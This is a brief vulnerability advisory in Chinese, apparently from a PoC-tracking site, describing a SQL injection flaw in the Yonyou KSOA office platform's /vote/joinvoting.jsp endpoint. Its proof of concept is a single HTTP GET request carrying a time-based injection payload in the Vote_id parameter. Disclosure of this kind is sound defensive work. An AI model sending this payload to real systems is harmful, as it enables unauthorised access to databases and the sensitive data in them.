用友时空KSOA /vote/joinvoting.jsp SQL 注入漏洞

2026-09-29 PoC Public

Description

用友时空KSOA是用友网络科技股份有限公司推出的协同办公与企业管理平台,面向企业组织提供知识管理、流程协作、投票调查、论坛交流、通讯录等办公自动化能力,帮助企业实现信息共享和业务协同。用友时空KSOA /vote/joinvoting.jsp 接口存在SQL注入漏洞,攻击者可获取数据库敏感信息。

PoC

GET /vote/joinvoting.jsp?Vote_id=%27;waitfor+delay+%270:0:0%27--+&isModel=&isClose= HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References